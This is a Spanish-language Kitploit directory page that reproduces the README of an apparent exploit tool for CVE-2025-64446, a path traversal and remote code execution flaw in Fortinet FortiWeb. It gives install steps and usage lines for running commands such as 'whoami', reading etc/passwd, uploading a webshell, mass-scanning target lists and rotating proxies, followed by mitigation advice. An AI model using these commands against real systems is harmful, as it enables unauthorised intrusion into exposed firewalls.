Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2025-64446-fortiweb-exploit — Herramienta de investigación de seguridad para detectar y probar la CVE-2025-64446 (vulnerabilidad RCE de Salto de Ruta en FortiWeb) | Kitploit
Herramientas/GitHubGitHub/an5i/cve-2025-64446-fortiweb-exploit
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHub
an5i/cve-2025-64446-fortiweb-exploit

cve-2025-64446-fortiweb-exploit

Herramienta de investigación de seguridad para detectar y probar la CVE-2025-64446 (vulnerabilidad RCE de Salto de Ruta en FortiWeb)

Ver Repositorio
111hace 9 mesesAún no revisado
Compartir

Exploit de Recorrido de Ruta y Ejecución Remota de Código CVE-2025-64446 para Fortinet FortiWeb

Una herramienta de investigación de seguridad para detectar y probar la vulnerabilidad CVE-2025-64446 en el Firewall de Aplicaciones Web (WAF) Fortinet FortiWeb. Esta vulnerabilidad crítica de recorrido de ruta de día cero ha sido explotada activamente en la naturaleza y permite a atacantes no autenticados evitar los controles de seguridad y ejecutar código arbitrario.

⚠️ Aviso

Esta herramienta es solo para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal. Utilice esta herramienta únicamente en sistemas de su propiedad o para los que tenga permiso explícito por escrito.

📋 Resumen

CVE-2025-64446 es una vulnerabilidad crítica de recorrido de ruta de día cero en Fortinet FortiWeb WAF que ha sido explotada activamente en la naturaleza. Esta vulnerabilidad permite a atacantes no autenticados evitar los controles de seguridad mediante ataques de recorrido de ruta, lo que podría llevar a la ejecución remota de código, acceso a archivos de configuración y compromiso total del sistema.

Puntuación CVSS: 9.8 (Crítica)
Estado: Explotado activamente en la naturaleza
CISA KEV: Agregado al catálogo de vulnerabilidades explotadas conocidas
Parche: FG-IR-25-910
Producto afectado: Fortinet FortiWeb WAF

🔍 Características

  • Detección automatizada de FortiWeb: Identifica implementaciones de FortiWeb WAF
  • Pruebas de recorrido de ruta: Prueba múltiples variaciones de payloads de recorrido de ruta
  • Confirmación de vulnerabilidad: Verifica la vulnerabilidad CVE-2025-64446
  • Acceso a archivos de configuración: Intenta leer archivos de configuración de FortiWeb
  • Despliegue de webshell: Demuestra la capacidad de subir una webshell
  • Ejecución de comandos: Ejecuta comandos arbitrarios (solo para pruebas autorizadas)
  • Soporte de múltiples hilos: Escanea múltiples objetivos en paralelo
  • Soporte de proxy: Evita restricciones de seguridad adicionales
  • Exportación JSON: Resultados detallados en formato JSON
  • Script POC incluido: Demostración simple de prueba de concepto

📦 Instalación

Requisitos previos

  • Python 3.6 o superior
  • pip (Administrador de paquetes de Python)

Instalación rápida

root@kitploit:~
# Clone the repository
git clone https://github.com/AN5I/cve-2025-64446-fortiweb-exploit.git
cd cve-2025-64446-fortiweb-exploit

# Install dependencies
pip install -r requirements.txt

# Make scripts executable (optional)
chmod +x cve_2025_64446_fortiweb_exploit.py
chmod +x cve_2025_64446_poc.py

Alternativa: Descarga directa

root@kitploit:~
# Download the scripts
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_fortiweb_exploit.py
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_poc.py

# Install dependencies
pip install requests

🚀 Uso

Uso básico

root@kitploit:~
# Single target
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com

# Execute custom command
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -c "whoami"

# Multiple targets from file
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json

# With threading for faster scanning
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -t 5

# Verbose output for debugging
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -v

Usando proxies

root@kitploit:~
# Single proxy
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com --proxy http://proxy:port

# Multiple proxies from file
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt

Script POC

root@kitploit:~
# Basic POC test
python3 cve_2025_64446_poc.py -u http://target.com

# Test specific file
python3 cve_2025_64446_poc.py -u http://target.com -f etc/passwd

# Verbose output
python3 cve_2025_64446_poc.py -u http://target.com -v

Opciones de línea de comandos

root@kitploit:~
-u, --url          URL objetivo
-f, --file         Archivo que contiene URLs objetivo (una por línea)
-c, --command      Comando a ejecutar (por defecto: id)
-t, --threads      Número de hilos (por defecto: 1)
-o, --output       Archivo de salida (por defecto: uknf_fortiweb_results.json)
-v, --verbose      Habilitar registro detallado
--proxy            URL del proxy (ej., http://127.0.0.1:8080)
--proxy-list       Archivo que contiene URLs de proxy (una por línea)

📊 Salida

El script genera un archivo JSON con resultados detallados:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-21T00:25:40.123456",
  "fortiweb_detected": true,
  "vulnerable": true,
  "path_traversal_successful": true,
  "config_file_read": true,
  "webshell_uploaded": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_payload": "../../../../etc/passwd"
}

🔬 Cómo funciona

  1. Fase de detección: Escanea en busca de indicadores de FortiWeb WAF (encabezados, contenido, páginas de error)
  2. Prueba de vulnerabilidad: Prueba múltiples variaciones de payloads de recorrido de ruta
  3. Confirmación de recorrido de ruta: Verifica el acceso exitoso a archivos
  4. Acceso a configuración: Intenta leer archivos de configuración de FortiWeb
  5. Explotación: Si es vulnerable, demuestra la capacidad de RCE mediante el despliegue de una webshell

🛡️ Mitigación

Si está utilizando FortiWeb WAF:

  1. Aplique las actualizaciones de seguridad inmediatamente:

    root@kitploit:~
    # Check current version
    show system status
    
    # Update to latest version
    execute upgrade <firmware-file>
    
    • Referencia: FG-IR-25-910
  2. Segmentación de red:

    • Restrinja el acceso a la interfaz de administración de FortiWeb
    • Implemente ACL de red
    • Use VPN para acceso administrativo
  3. Endurecimiento de configuración:

    • Desactive funciones innecesarias
    • Implemente controles de acceso estrictos
    • Habilite el registro y monitoreo exhaustivo
  4. Requisitos de CISA:

    • Las agencias federales deben aplicar el parche en un plazo de 7 días
    • Monitoree el catálogo CISA KEV para actualizaciones

📚 Referencias

  • CVE: CVE-2025-64446
  • Fortinet PSIRT: FG-IR-25-910
  • Catálogo CISA KEV: CVE-2025-64446
  • Blog de Tenable: Análisis CVE-2025-64446

📖 Ejemplos

Ejemplo 1: Escaneo de un solo objetivo

root@kitploit:~
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com

Ejemplo 2: Múltiples objetivos con salida

root@kitploit:~
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Run scan
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json

Ejemplo 3: Ejecución de comando personalizado

root@kitploit:~
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com -c "uname -a"

Ejemplo 4: Uso de proxies

root@kitploit:~
# Single proxy
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com --proxy http://127.0.0.1:8080

# Multiple proxies from file
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt

Ejemplo 5: Prueba POC

root@kitploit:~
# Basic POC
python3 cve_2025_64446_poc.py -u https://example.com

# Test specific file
python3 cve_2025_64446_poc.py -u https://example.com -f etc/passwd

🤝 Contribuciones

¡Las contribuciones son bienvenidas! No dude en enviar una solicitud de extracción (Pull Request).

  1. Haga un fork del repositorio
  2. Cree su rama de funcionalidad (git checkout -b feature/CaracteristicaIncreible)
  3. Confirme sus cambios (git commit -m 'Añadir alguna CaracterísticaIncreible')
  4. Empuje a la rama (git push origin feature/CaracteristicaIncreible)
  5. Abra una solicitud de extracción (Pull Request)

🐛 Problemas

Si encuentra algún problema o tiene sugerencias, abra un issue en GitHub.

📝 Licencia

Este proyecto está licenciado bajo la Licencia MIT; consulte el archivo LICENSE para más detalles.

⭐ Historial de estrellas

Si encuentra útil esta herramienta, ¡considere darle una estrella en GitHub!

⚖️ Legal

Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. Los autores no son responsables del mal uso o daños causados por este programa. Los usuarios son responsables de asegurarse de tener la autorización adecuada antes de probar cualquier sistema.

🙏 Agradecimientos

  • Investigador de vulnerabilidades original y investigadores de seguridad
  • Fortinet PSIRT por la divulgación de vulnerabilidades
  • CISA por mantener el catálogo KEV
  • Comunidad de seguridad por la investigación continua

💰 Donaciones

Si encuentra útil esta herramienta y desea apoyar el proyecto:

Bitcoin (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

¡Gracias por tu apoyo! 🙏

Descargar herramienta